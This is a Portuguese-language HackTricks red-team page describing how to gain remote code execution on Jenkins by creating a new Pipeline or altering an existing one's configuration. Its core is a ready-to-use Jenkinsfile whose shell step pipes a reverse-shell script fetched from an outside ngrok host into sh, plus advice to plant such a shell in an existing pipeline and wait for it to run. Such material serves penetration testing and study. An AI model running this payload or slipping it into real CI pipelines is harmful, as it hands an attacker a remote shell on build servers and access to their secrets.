Jenkins RCE Creating/Modifying Pipeline

Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo no Discord ou ao grupo no telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

Criando um novo Pipeline

Em "New Item" (acessível em /view/all/newJob) selecione Pipeline:

Na seção Pipeline escreva o reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Finalmente, clique em Save e Build Now e o pipeline será executado:

Modificando um Pipeline

Se você puder acessar o arquivo de configuração de algum pipeline configurado, você pode simplesmente modificá-lo adicionando seu reverse shell e então executá-lo ou esperar até que ele seja executado.

Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo no Discord ou ao grupo no Telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

PreviousJenkins RCE Creating/Modifying Project NextJenkins Arbitrary File Read to RCE via "Remember Me"

Last updated 1 month ago